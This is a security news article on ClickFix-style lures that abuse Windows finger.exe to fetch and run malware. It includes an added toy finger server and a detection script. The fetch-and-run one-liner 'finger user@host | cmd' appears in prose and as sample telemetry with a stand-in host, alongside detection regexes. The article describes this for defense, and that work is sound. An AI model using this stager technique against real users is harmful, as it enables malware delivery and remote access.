Relic Weaponized: Obscure ‘finger’ Command Used to Download Malware on Windows
A nearly forgotten utility has unexpectedly returned to the spotlight after being discovered in new infection chains targeting Windows devices. A mechanism long regarded as a relic of the early internet is now being weaponized in attacks disguised as harmless verification checks, whose "fix" is a command the victim is told to paste into the Run dialog or a console window.
The finger command, originally a way to look up information about users on Unix hosts, has also shipped with Windows for decades and is still present as finger.exe in current releases. It returned basic details such as login names, home directories and similar attributes. The protocol, which runs over TCP port 79, is still supported, but its practical use has all but vanished. That obscurity works to the attackers' advantage: few people expect any meaningful network activity to travel over such an antiquated channel, and few defenders have detection rules watching for it.
Recent observations show that finger is being incorporated into schemes reminiscent of ClickFix, in which the commands executed on a device are fetched from a remote source rather than embedded in the lure. The command has been catalogued for years as a living-off-the-land binary: finger.exe will happily print whatever text a server returns, so a server the attacker controls turns it into a download channel for malicious payloads.
In the latest campaigns, this method has been further refined. MalwareHunterTeam shared a batch-script sample that queried a remote server via finger and piped the response directly into cmd for execution. The domains involved have since gone offline, but investigators have identified additional instances using the same technique.
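The exchange the batch sample relies on is the plain finger protocol (RFC 1288): the client connects, sends one line, and prints whatever comes back until the server closes the connection. The following is an added example for this article, not code from the article or from the campaign it describes. It runs a toy finger server on localhost that answers any query with operator-chosen text and a client that makes the same request `finger user@host` would; the reply text and the "user" name are constructed. The server binds an ephemeral port because TCP 79 needs privileges; finger.exe itself has no port option and always talks to 79.

```python
"""Minimal finger (RFC 1288) exchange on localhost.

Added example; not code from the article or from the campaign it describes.
The server answers any query with operator-chosen text, which is exactly the
property the attackers rely on; the client performs the same request that
`finger user@host` makes. The reply text and user name are constructed.
"""
import socket
import threading

CRLF = b"\r\n"

# Constructed reply: whatever the server sends back is what a victim's
# `finger ... | cmd` would hand to the interpreter. This one is inert text.
CONSTRUCTED_REPLY = "echo reply from finger server\r\necho second line\r\n"


def start_finger_server(reply=CONSTRUCTED_REPLY):
    """Start a one-shot finger server on 127.0.0.1 and return (host, port)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))  # ephemeral port; real finger is TCP 79
    srv.listen(1)
    host, port = srv.getsockname()

    def serve_once():
        conn, _ = srv.accept()
        with conn:
            # RFC 1288 request: a single line, "username" or empty, ended by
            # CRLF. This server ignores who was asked for and answers the same
            # way regardless, just as a payload server would.
            query = b""
            while not query.endswith(CRLF) and len(query) < 1024:
                byte = conn.recv(1)
                if not byte:
                    break
                query += byte
            conn.sendall(reply.encode("ascii"))
            # The reply has no terminator; closing the connection ends it.
        srv.close()

    threading.Thread(target=serve_once, daemon=True).start()
    return host, port


def finger_query(host, port, user="", timeout=5.0):
    """Send a finger query and return the complete reply as text."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(user.encode("ascii") + CRLF)
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:  # server closed: end of reply
                break
            chunks.append(data)
    return b"".join(chunks).decode("ascii", errors="replace")


if __name__ == "__main__":
    host, port = start_finger_server()
    print(finger_query(host, port, "user"))
```

Nothing in the protocol distinguishes a user profile from a list of commands; the client simply prints the bytes. That is why `finger user@host | cmd` is enough to turn a 1970s lookup tool into a stager, and why the response content, not the request, is where a defender has to look.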
Reports from early victims have already surfaced on Reddit. In one discussion, a user described encountering a fake CAPTCHA that instructed them to open the Run dialog and type a command to "prove" they were human. The supplied command issued a finger request to another server and sent the resulting output straight into the Windows command interpreter, cmd.
The fetched sequence created a temporary directory, copied the system's curl binary under a random name, downloaded an archive disguised as a PDF, and extracted several Python files. The extracted script was then launched with pythonw.exe, which runs without a visible console window, contacted the attackers' server, and displayed a counterfeit "verification" screen.
The archive’s contents suggested data-theft functionality. Simultaneously, MalwareHunterTeam uncovered another variant of the activity: finger was used to fetch a nearly identical command set, this time with added safeguards. Before executing any actions, the script scanned the system for malware-analysis tools — including Process Explorer, Procmon, Wireshark, Fiddler, and various debuggers. If any were detected, execution halted.
When no such tools were found, the script downloaded and unpacked a new archive, again disguised as a PDF. This time the payload contained the NetSupport Manager remote-administration suite. After extraction, a series of commands created a scheduled task that launches the remote-access software at the next logon, giving the attackers persistence.
According to BleepingComputer, all noted incidents bear the hallmarks of a single group employing a unified strategy to distribute malware using ClickFix-style mechanisms. The effectiveness of these ploys stems largely from the command's archaic nature: finger seems far too outdated to raise suspicion. Security experts advise blocking outbound connections on TCP port 79, the protocol's transport channel, on host firewalls and at the network edge to reduce exposure. Because finger.exe has no option to use another port, that block defeats this particular tool, although an attacker can fall back to other download channels. On the detection side, any execution of finger.exe on a managed Windows host is rare enough to be worth an alert, and a command line that pipes finger output into cmd or PowerShell is the fetch-and-run pattern itself.
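The port-79 block covers the network side; the process side is a rule over process-creation telemetry. The following is an added example for this article, not code from the article, from MalwareHunterTeam or from any vendor product. It flags the two shapes described above, finger output piped into a shell interpreter and finger.exe itself running, and runs over constructed records laid out like Sysmon Event ID 1 or Windows Security 4688 fields (Image, ParentImage, CommandLine). The hostnames, field names and severity levels are assumptions.

```python
"""Flag finger.exe abuse in process-creation telemetry.

Added example; not code from the article or from any product. The sample
records are constructed in the shape of Sysmon Event ID 1 / Windows 4688
fields. Hostnames, field names and severity thresholds are assumptions.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# finger (with or without .exe), then anything except another pipe or '&',
# then a pipe into cmd / powershell / pwsh: the fetch-and-run one-liner.
FINGER_PIPE_RE = re.compile(
    r"\bfinger(?:\.exe)?\b[^|&]*\|\s*(?:cmd|powershell|pwsh)(?:\.exe)?\b",
    re.IGNORECASE,
)

# Parents consistent with the lure: the victim types the command into the
# Run dialog (explorer.exe) or a console, so finger.exe is a child of these.
LURE_PARENTS = {"explorer.exe", "cmd.exe", "powershell.exe", "pwsh.exe"}


@dataclass
class ProcessEvent:
    image: str
    parent_image: str
    command_line: str


@dataclass
class Alert:
    severity: str
    reason: str
    event: ProcessEvent


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event: ProcessEvent) -> Optional[Alert]:
    """Return an Alert for one process-creation event, or None if it is clean."""
    if FINGER_PIPE_RE.search(event.command_line):
        return Alert("high", "finger output piped into a shell interpreter", event)
    if _basename(event.image) == "finger.exe":
        # finger.exe is almost never used legitimately on managed Windows
        # hosts, so any execution is worth a look; spawned from the Run dialog
        # or a shell it matches the lure, so it is rated higher.
        severity = "high" if _basename(event.parent_image) in LURE_PARENTS else "medium"
        return Alert(severity, "finger.exe executed", event)
    return None


def scan(events: List[ProcessEvent]) -> List[Alert]:
    """Evaluate a batch of events and return the alerts in input order."""
    return [a for a in (evaluate(e) for e in events) if a is not None]


# Constructed sample telemetry (not real victim data).
SAMPLE_EVENTS = [
    # The Run-dialog lure: a one-liner that fetches text over finger and runs it.
    ProcessEvent(
        r"C:\Windows\System32\cmd.exe",
        r"C:\Windows\explorer.exe",
        r"cmd /c finger user@finger.example.invalid | cmd",
    ),
    # The child finger.exe spawned by that cmd.exe.
    ProcessEvent(
        r"C:\Windows\System32\finger.exe",
        r"C:\Windows\System32\cmd.exe",
        r"finger  user@finger.example.invalid",
    ),
    # Benign: a pipe that merely mentions "finger" as a search string.
    ProcessEvent(
        r"C:\Windows\System32\cmd.exe",
        r"C:\Windows\explorer.exe",
        r"cmd /c dir /b | findstr finger",
    ),
    # Benign: unrelated process.
    ProcessEvent(
        r"C:\Windows\System32\notepad.exe",
        r"C:\Windows\explorer.exe",
        r"notepad.exe report.txt",
    ),
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(f"[{alert.severity}] {alert.reason}: {alert.event.command_line}")
```

The two rules are deliberately independent: the regex catches the parent command line even when finger.exe never appears as its own event (for example, if process creation for the child is not logged), and the image check catches finger.exe even when the pipe lives in a batch file rather than on the command line. Tuning the parent list to the organisation's own telemetry is expected; the severities here are illustrative.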